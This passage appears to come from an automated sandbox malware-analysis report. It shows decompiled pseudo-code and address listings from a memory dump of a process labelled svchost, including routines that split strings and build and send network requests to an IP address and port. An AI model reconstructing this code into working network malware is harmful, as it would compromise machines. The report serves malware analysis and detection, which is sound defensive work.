                                                                                                                                                                                                                                                                          				goto L25;
                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                          0x0401a890
                                                                                                                                                                                                                                                                          0x0401a890
                                                                                                                                                                                                                                                                          0x0401a890
                                                                                                                                                                                                                                                                          0x0401a8a0
                                                                                                                                                                                                                                                                          0x0401a8a3
                                                                                                                                                                                                                                                                          0x0401a8a9
                                                                                                                                                                                                                                                                          0x0401a8b0
                                                                                                                                                                                                                                                                          0x0401a8b7
                                                                                                                                                                                                                                                                          0x0401a8d8
                                                                                                                                                                                                                                                                          0x0401a8dd
                                                                                                                                                                                                                                                                          0x0401a8e0
                                                                                                                                                                                                                                                                          0x0401a8ed
                                                                                                                                                                                                                                                                          0x0401a902
                                                                                                                                                                                                                                                                          0x0401a907
                                                                                                                                                                                                                                                                          0x0401a90f
                                                                                                                                                                                                                                                                          0x0401a92c
                                                                                                                                                                                                                                                                          0x0401a933
                                                                                                                                                                                                                                                                          0x0401a93a
                                                                                                                                                                                                                                                                          0x0401a948
                                                                                                                                                                                                                                                                          0x0401a95c
                                                                                                                                                                                                                                                                          0x0401a9a5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401a9a7
                                                                                                                                                                                                                                                                          0x0401a9b1
                                                                                                                                                                                                                                                                          0x0401a9be
                                                                                                                                                                                                                                                                          0x0401a9cd
                                                                                                                                                                                                                                                                          0x0401a9e0
                                                                                                                                                                                                                                                                          0x0401a9e5
                                                                                                                                                                                                                                                                          0x0401a9ed
                                                                                                                                                                                                                                                                          0x0401a9fc
                                                                                                                                                                                                                                                                          0x0401aa01
                                                                                                                                                                                                                                                                          0x0401aa01
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401aa04
                                                                                                                                                                                                                                                                          0x0401a9be
                                                                                                                                                                                                                                                                          0x0401a95e
                                                                                                                                                                                                                                                                          0x0401a968
                                                                                                                                                                                                                                                                          0x0401a97b
                                                                                                                                                                                                                                                                          0x0401a980
                                                                                                                                                                                                                                                                          0x0401a988
                                                                                                                                                                                                                                                                          0x0401a997
                                                                                                                                                                                                                                                                          0x0401a99c
                                                                                                                                                                                                                                                                          0x0401a99c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401a99f
                                                                                                                                                                                                                                                                          0x0401a94a
                                                                                                                                                                                                                                                                          0x0401a94d
                                                                                                                                                                                                                                                                          0x0401aa0b
                                                                                                                                                                                                                                                                          0x0401aa18
                                                                                                                                                                                                                                                                          0x0401aa24
                                                                                                                                                                                                                                                                          0x0401aa32
                                                                                                                                                                                                                                                                          0x0401aa3a
                                                                                                                                                                                                                                                                          0x0401aa41
                                                                                                                                                                                                                                                                          0x0401aa4b
                                                                                                                                                                                                                                                                          0x0401aa57
                                                                                                                                                                                                                                                                          0x0401aa65
                                                                                                                                                                                                                                                                          0x0401aa73
                                                                                                                                                                                                                                                                          0x0401aa81
                                                                                                                                                                                                                                                                          0x0401aa8f
                                                                                                                                                                                                                                                                          0x0401aa9d
                                                                                                                                                                                                                                                                          0x0401aaab
                                                                                                                                                                                                                                                                          0x0401aab9
                                                                                                                                                                                                                                                                          0x0401aac7
                                                                                                                                                                                                                                                                          0x0401aad5
                                                                                                                                                                                                                                                                          0x0401aae3
                                                                                                                                                                                                                                                                          0x0401aaf1
                                                                                                                                                                                                                                                                          0x0401aafa
                                                                                                                                                                                                                                                                          0x0401ab03
                                                                                                                                                                                                                                                                          0x0401ab0c
                                                                                                                                                                                                                                                                          0x0401ab22
                                                                                                                                                                                                                                                                          0x0401ab45
                                                                                                                                                                                                                                                                          0x0401ab56
                                                                                                                                                                                                                                                                          0x0401ab64
                                                                                                                                                                                                                                                                          0x0401ab74
                                                                                                                                                                                                                                                                          0x0401ab79
                                                                                                                                                                                                                                                                          0x0401ab7f
                                                                                                                                                                                                                                                                          0x0401ab86
                                                                                                                                                                                                                                                                          0x0401aba1
                                                                                                                                                                                                                                                                          0x0401aba8
                                                                                                                                                                                                                                                                          0x0401abaa
                                                                                                                                                                                                                                                                          0x0401abad
                                                                                                                                                                                                                                                                          0x0401abba
                                                                                                                                                                                                                                                                          0x0401abbf
                                                                                                                                                                                                                                                                          0x0401abc2
                                                                                                                                                                                                                                                                          0x0401abc2
                                                                                                                                                                                                                                                                          0x0401abcb
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401abcb
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401a935
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401a8ef
                                                                                                                                                                                                                                                                          0x0401abd1
                                                                                                                                                                                                                                                                          0x0401abd5
                                                                                                                                                                                                                                                                          0x0401abdd
                                                                                                                                                                                                                                                                          0x0401abe0
                                                                                                                                                                                                                                                                          0x0401abed
                                                                                                                                                                                                                                                                          0x0401abf5
                                                                                                                                                                                                                                                                          0x0401abf5
                                                                                                                                                                                                                                                                          0x0401ac0c
                                                                                                                                                                                                                                                                          0x0401ac0c
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _memset_strnlen$_strlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1397555153-0
                                                                                                                                                                                                                                                                          • Opcode ID: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                                          • Instruction ID: 9948d87256a1ab2e7e4c421ed80cf7a845357aae833f097959cef4c1dbbed60e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB17B75E012499FDB14CF90C881BEEF7B1EF48308F14C19AE8596B391D634AA86CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                                                          			E04012D20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				signed int _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                          				signed int _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _t115;
                                                                                                                                                                                                                                                                          				intOrPtr _t120;
                                                                                                                                                                                                                                                                          				intOrPtr _t130;
                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                          				void* _t151;
                                                                                                                                                                                                                                                                          				void* _t203;
                                                                                                                                                                                                                                                                          				void* _t204;
                                                                                                                                                                                                                                                                          				void* _t205;
                                                                                                                                                                                                                                                                          				void* _t206;
                                                                                                                                                                                                                                                                          				void* _t207;
                                                                                                                                                                                                                                                                          				void* _t209;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t204 = __esi;
                                                                                                                                                                                                                                                                          				_t203 = __edi;
                                                                                                                                                                                                                                                                          				_t151 = __ebx;
                                                                                                                                                                                                                                                                          				_v76 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				while(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_t115 = E040070A0( *((intOrPtr*)(_a4 + 4)));
                                                                                                                                                                                                                                                                          					_t206 = _t205 + 4;
                                                                                                                                                                                                                                                                          					_v12 = _t115;
                                                                                                                                                                                                                                                                          					if(_v12 >= 1) {
                                                                                                                                                                                                                                                                          						_v16 = 0xffffffff;
                                                                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                                                                          						while(_v28 < _v12) {
                                                                                                                                                                                                                                                                          							if( *((char*)( *((intOrPtr*)(_a4 + 4)) + _v28)) != 0x3a) {
                                                                                                                                                                                                                                                                          								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v16 = _v28;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_v16 >= 0) {
                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                          							_t29 =  *((intOrPtr*)(_a4 + 4)) + 1; // 0x1
                                                                                                                                                                                                                                                                          							_t120 = E0401EBC0(_t151, _t203, _t204, _v16 + _t29, _v12 - _v16 + 1, 0x426f4c,  &_v20);
                                                                                                                                                                                                                                                                          							_t205 = _t206 + 0x10;
                                                                                                                                                                                                                                                                          							_v24 = _t120;
                                                                                                                                                                                                                                                                          							if(_v24 > 0 && _v20 != 0) {
                                                                                                                                                                                                                                                                          								E040228B0(_t151, _t203, _t204, _v20, 4, _v24);
                                                                                                                                                                                                                                                                          								_t207 = _t205 + 0xc;
                                                                                                                                                                                                                                                                          								_v40 = _v24 - 1;
                                                                                                                                                                                                                                                                          								_v44 = 0;
                                                                                                                                                                                                                                                                          								while(_v44 < _v24) {
                                                                                                                                                                                                                                                                          									_t148 = E040070A0( *((intOrPtr*)(_v20 + _v44 * 4)));
                                                                                                                                                                                                                                                                          									_t207 = _t207 + 4;
                                                                                                                                                                                                                                                                          									_v40 = _t148 + _v40;
                                                                                                                                                                                                                                                                          									_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v60 = E04020CE0(_v40 + 1);
                                                                                                                                                                                                                                                                          								_v32 = _v60;
                                                                                                                                                                                                                                                                          								E04007010(_t203, _v32, 0, _v40 + 1);
                                                                                                                                                                                                                                                                          								_t209 = _t207 + 0x10;
                                                                                                                                                                                                                                                                          								_v36 = 0;
                                                                                                                                                                                                                                                                          								_v48 = 0;
                                                                                                                                                                                                                                                                          								while(_v48 < _v24) {
                                                                                                                                                                                                                                                                          									_v52 = E040070A0( *((intOrPtr*)(_v20 + _v48 * 4)));
                                                                                                                                                                                                                                                                          									_push(_v52);
                                                                                                                                                                                                                                                                          									E04006CA0(_t151, _t203, _t204, _v32 + _v36,  *((intOrPtr*)(_v20 + _v48 * 4)));
                                                                                                                                                                                                                                                                          									_t209 = _t209 + 0x10;
                                                                                                                                                                                                                                                                          									_v36 = _v36 + _v52;
                                                                                                                                                                                                                                                                          									 *((char*)(_v32 + _v36)) = 0x20;
                                                                                                                                                                                                                                                                          									_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                          									_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_t130 = E04020CE0(8);
                                                                                                                                                                                                                                                                          								_t205 = _t209 + 4;
                                                                                                                                                                                                                                                                          								_v64 = _t130;
                                                                                                                                                                                                                                                                          								if(_v64 == 0) {
                                                                                                                                                                                                                                                                          									_v80 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v80 = E0401F4E0(_v64);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v8 = _v80;
                                                                                                                                                                                                                                                                          								E0401FC90(_t151, _v8, _t203, _t204, _v32, _v40);
                                                                                                                                                                                                                                                                          								_v56 = 0;
                                                                                                                                                                                                                                                                          								while(_v56 < _v24) {
                                                                                                                                                                                                                                                                          									if( *((intOrPtr*)(_v20 + _v56 * 4)) != 0) {
                                                                                                                                                                                                                                                                          										_v68 =  *((intOrPtr*)(_v20 + _v56 * 4));
                                                                                                                                                                                                                                                                          										E04020CC0(_v68);
                                                                                                                                                                                                                                                                          										_t205 = _t205 + 4;
                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_v20 + _v56 * 4)) = 0x666;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v20 != 0) {
                                                                                                                                                                                                                                                                          									_v72 = _v20;
                                                                                                                                                                                                                                                                          									E04020CC0(_v72);
                                                                                                                                                                                                                                                                          									_t205 = _t205 + 4;
                                                                                                                                                                                                                                                                          									_v20 = 0x666;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if(0 != 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L35:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L35;
                                                                                                                                                                                                                                                                          			}

































                                                                                                                                                                                                                                                                          0x04012d20
                                                                                                                                                                                                                                                                          0x04012d20
                                                                                                                                                                                                                                                                          0x04012d20
                                                                                                                                                                                                                                                                          0x04012d26
                                                                                                                                                                                                                                                                          0x04012d29
                                                                                                                                                                                                                                                                          0x04012d30
                                                                                                                                                                                                                                                                          0x04012d42
                                                                                                                                                                                                                                                                          0x04012d47
                                                                                                                                                                                                                                                                          0x04012d4a
                                                                                                                                                                                                                                                                          0x04012d51
                                                                                                                                                                                                                                                                          0x04012d58
                                                                                                                                                                                                                                                                          0x04012d5f
                                                                                                                                                                                                                                                                          0x04012d71
                                                                                                                                                                                                                                                                          0x04012d89
                                                                                                                                                                                                                                                                          0x04012d6e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04012d8b
                                                                                                                                                                                                                                                                          0x04012d8e
                                                                                                                                                                                                                                                                          0x04012d8e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04012d89
                                                                                                                                                                                                                                                                          0x04012d99
                                                                                                                                                                                                                                                                          0x04012da0
                                                                                                                                                                                                                                                                          0x04012dc5
                                                                                                                                                                                                                                                                          0x04012dca
                                                                                                                                                                                                                                                                          0x04012dcf
                                                                                                                                                                                                                                                                          0x04012dd2
                                                                                                                                                                                                                                                                          0x04012dd9
                                                                                                                                                                                                                                                                          0x04012df3
                                                                                                                                                                                                                                                                          0x04012df8
                                                                                                                                                                                                                                                                          0x04012e01
                                                                                                                                                                                                                                                                          0x04012e04
                                                                                                                                                                                                                                                                          0x04012e16
                                                                                                                                                                                                                                                                          0x04012e28
                                                                                                                                                                                                                                                                          0x04012e2d
                                                                                                                                                                                                                                                                          0x04012e33
                                                                                                                                                                                                                                                                          0x04012e13
                                                                                                                                                                                                                                                                          0x04012e13
                                                                                                                                                                                                                                                                          0x04012e47
                                                                                                                                                                                                                                                                          0x04012e4d
                                                                                                                                                                                                                                                                          0x04012e5d
                                                                                                                                                                                                                                                                          0x04012e62
                                                                                                                                                                                                                                                                          0x04012e65
                                                                                                                                                                                                                                                                          0x04012e6c
                                                                                                                                                                                                                                                                          0x04012e7e
                                                                                                                                                                                                                                                                          0x04012e98
                                                                                                                                                                                                                                                                          0x04012e9e
                                                                                                                                                                                                                                                                          0x04012eb0
                                                                                                                                                                                                                                                                          0x04012eb5
                                                                                                                                                                                                                                                                          0x04012ebe
                                                                                                                                                                                                                                                                          0x04012ec7
                                                                                                                                                                                                                                                                          0x04012ed0
                                                                                                                                                                                                                                                                          0x04012e7b
                                                                                                                                                                                                                                                                          0x04012e7b
                                                                                                                                                                                                                                                                          0x04012ed7
                                                                                                                                                                                                                                                                          0x04012edc
                                                                                                                                                                                                                                                                          0x04012edf
                                                                                                                                                                                                                                                                          0x04012ee6
                                                                                                                                                                                                                                                                          0x04012ef5
                                                                                                                                                                                                                                                                          0x04012ee8
                                                                                                                                                                                                                                                                          0x04012ef0
                                                                                                                                                                                                                                                                          0x04012ef0
                                                                                                                                                                                                                                                                          0x04012eff
                                                                                                                                                                                                                                                                          0x04012f0d
                                                                                                                                                                                                                                                                          0x04012f12
                                                                                                                                                                                                                                                                          0x04012f24
                                                                                                                                                                                                                                                                          0x04012f36
                                                                                                                                                                                                                                                                          0x04012f41
                                                                                                                                                                                                                                                                          0x04012f48
                                                                                                                                                                                                                                                                          0x04012f4d
                                                                                                                                                                                                                                                                          0x04012f56
                                                                                                                                                                                                                                                                          0x04012f56
                                                                                                                                                                                                                                                                          0x04012f21
                                                                                                                                                                                                                                                                          0x04012f21
                                                                                                                                                                                                                                                                          0x04012f63
                                                                                                                                                                                                                                                                          0x04012f68
                                                                                                                                                                                                                                                                          0x04012f6f
                                                                                                                                                                                                                                                                          0x04012f74
                                                                                                                                                                                                                                                                          0x04012f77
                                                                                                                                                                                                                                                                          0x04012f77
                                                                                                                                                                                                                                                                          0x04012f63
                                                                                                                                                                                                                                                                          0x04012f80
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04012d9b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04012d53
                                                                                                                                                                                                                                                                          0x04012f86
                                                                                                                                                                                                                                                                          0x04012f8c
                                                                                                                                                                                                                                                                          0x04012f8c
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4218353326-0
                                                                                                                                                                                                                                                                          • Opcode ID: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                                          • Instruction ID: b4162b3583ba2dec2d6c765e4cdbb5ffec497666bde8b264905ccdcb2170b9d4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB81D3B4E01209DBDF04CF98D984AEEB7B2BF48308F2485A9E41577390E735AA45DF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: codecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                          • Opcode ID: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                                          • Instruction ID: 8ef4f0843c548fec2a10bde5c14a40ad8c72f7d7392924089e823b54c74d7b66
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E891C774A00208EFDB54DF94C894B9DBBB2FF48354F608259E9156B3A0D775EA82CF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                                                                                                                          			E040115C0(void* __ebx, unsigned int** __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                          				unsigned int* _v8;
                                                                                                                                                                                                                                                                          				signed short _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				short _v30;
                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                                                                                                          				unsigned int* _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				unsigned int* _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                          				unsigned int* _v88;
                                                                                                                                                                                                                                                                          				unsigned int* _v92;
                                                                                                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                                                                                                          				unsigned int* _v100;
                                                                                                                                                                                                                                                                          				unsigned int* _v104;
                                                                                                                                                                                                                                                                          				unsigned int** _v108;
                                                                                                                                                                                                                                                                          				unsigned int* _v112;
                                                                                                                                                                                                                                                                          				unsigned int* _v116;
                                                                                                                                                                                                                                                                          				unsigned int* _t84;
                                                                                                                                                                                                                                                                          				intOrPtr _t97;
                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                          				intOrPtr _t103;
                                                                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                          				signed int _t154;
                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                          				void* _t160;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t153 = __esi;
                                                                                                                                                                                                                                                                          				_t152 = __edi;
                                                                                                                                                                                                                                                                          				_t109 = __ebx;
                                                                                                                                                                                                                                                                          				_v16 =  *0x429024 ^ _t154;
                                                                                                                                                                                                                                                                          				_v108 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                          					if(( *_v108)[1] == 0) {
                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t103 = E040070A0(( *_v108)[1]);
                                                                                                                                                                                                                                                                          						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                          						_v80 = _t103;
                                                                                                                                                                                                                                                                          						if(_v80 <= 0) {
                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v84 = E04020CE0(8);
                                                                                                                                                                                                                                                                          							if(_v84 == 0) {
                                                                                                                                                                                                                                                                          								_v112 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v112 = E0401F4E0(_v84);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v8 = _v112;
                                                                                                                                                                                                                                                                          							_t149 =  *_v108;
                                                                                                                                                                                                                                                                          							E0401FC90(_t109, _v8, _t152, _t153, ( *_v108)[1], _v80);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					break;
                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                          					_v88 = E04020CE0(0x11);
                                                                                                                                                                                                                                                                          					_v68 = _v88;
                                                                                                                                                                                                                                                                          					E04007010(_t152, _v68, 0, 0x11);
                                                                                                                                                                                                                                                                          					 *0x4251f8(_v68, 0x10, 0x427088, ( *( *_v108) >> 0x00000010 & 0xffff) >> 0x00000008 & 0xff,  *( *_v108) >> 0x00000010 & 0xff, ( *( *_v108) & 0xffff) >> 0x00000008 & 0xff,  *( *_v108) & 0xff);
                                                                                                                                                                                                                                                                          					_t84 = E04020CE0(0x401);
                                                                                                                                                                                                                                                                          					_t155 = _t155 + 0x30;
                                                                                                                                                                                                                                                                          					_v92 = _t84;
                                                                                                                                                                                                                                                                          					_v76 = _v92;
                                                                                                                                                                                                                                                                          					_v12 = 0x6987;
                                                                                                                                                                                                                                                                          					_v32 = 2;
                                                                                                                                                                                                                                                                          					_v28 =  *0x425258(_v68);
                                                                                                                                                                                                                                                                          					_v30 =  *0x425278(_v12 & 0x0000ffff);
                                                                                                                                                                                                                                                                          					_t149 =  &_v64;
                                                                                                                                                                                                                                                                          					_v72 =  *0x425250( &_v32, 0x10, _v76, 0x401,  &_v64, 0x20, 8);
                                                                                                                                                                                                                                                                          					if(_v72 == 0) {
                                                                                                                                                                                                                                                                          						_t97 = E04020CE0(8);
                                                                                                                                                                                                                                                                          						_t160 = _t155 + 4;
                                                                                                                                                                                                                                                                          						_v96 = _t97;
                                                                                                                                                                                                                                                                          						if(_v96 == 0) {
                                                                                                                                                                                                                                                                          							_v116 = 0;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v116 = E0401F4E0(_v96);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t149 = _v116;
                                                                                                                                                                                                                                                                          						_v8 = _v116;
                                                                                                                                                                                                                                                                          						_t99 = E040070A0(_v76);
                                                                                                                                                                                                                                                                          						_t155 = _t160 + 4;
                                                                                                                                                                                                                                                                          						E0401FC90(_t109, _v8, _t152, _t153, _v76, _t99);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v76 != 0) {
                                                                                                                                                                                                                                                                          						_t149 = _v76;
                                                                                                                                                                                                                                                                          						_v100 = _v76;
                                                                                                                                                                                                                                                                          						E04020CC0(_v100);
                                                                                                                                                                                                                                                                          						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                          						_v76 = 0x666;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v68 != 0) {
                                                                                                                                                                                                                                                                          						_v104 = _v68;
                                                                                                                                                                                                                                                                          						_t149 = _v104;
                                                                                                                                                                                                                                                                          						E04020CC0(_v104);
                                                                                                                                                                                                                                                                          						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                          						_v68 = 0x666;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				} while (0 != 0);
                                                                                                                                                                                                                                                                          				return E04006C8C(_v8, _t109, _v16 ^ _t154, _t149, _t152, _t153);
                                                                                                                                                                                                                                                                          			}

































                                                                                                                                                                                                                                                                          0x040115c0
                                                                                                                                                                                                                                                                          0x040115c0
                                                                                                                                                                                                                                                                          0x040115c0
                                                                                                                                                                                                                                                                          0x040115cd
                                                                                                                                                                                                                                                                          0x040115d0
                                                                                                                                                                                                                                                                          0x040115d3
                                                                                                                                                                                                                                                                          0x040115da
                                                                                                                                                                                                                                                                          0x040115e3
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040115e5
                                                                                                                                                                                                                                                                          0x040115ee
                                                                                                                                                                                                                                                                          0x040115f3
                                                                                                                                                                                                                                                                          0x040115f6
                                                                                                                                                                                                                                                                          0x040115fd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040115ff
                                                                                                                                                                                                                                                                          0x04011609
                                                                                                                                                                                                                                                                          0x04011610
                                                                                                                                                                                                                                                                          0x0401161f
                                                                                                                                                                                                                                                                          0x04011612
                                                                                                                                                                                                                                                                          0x0401161a
                                                                                                                                                                                                                                                                          0x0401161a
                                                                                                                                                                                                                                                                          0x04011629
                                                                                                                                                                                                                                                                          0x04011633
                                                                                                                                                                                                                                                                          0x0401163c
                                                                                                                                                                                                                                                                          0x0401163c
                                                                                                                                                                                                                                                                          0x040115fd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04011646
                                                                                                                                                                                                                                                                          0x04011650
                                                                                                                                                                                                                                                                          0x04011656
                                                                                                                                                                                                                                                                          0x04011661
                                                                                                                                                                                                                                                                          0x040116e5
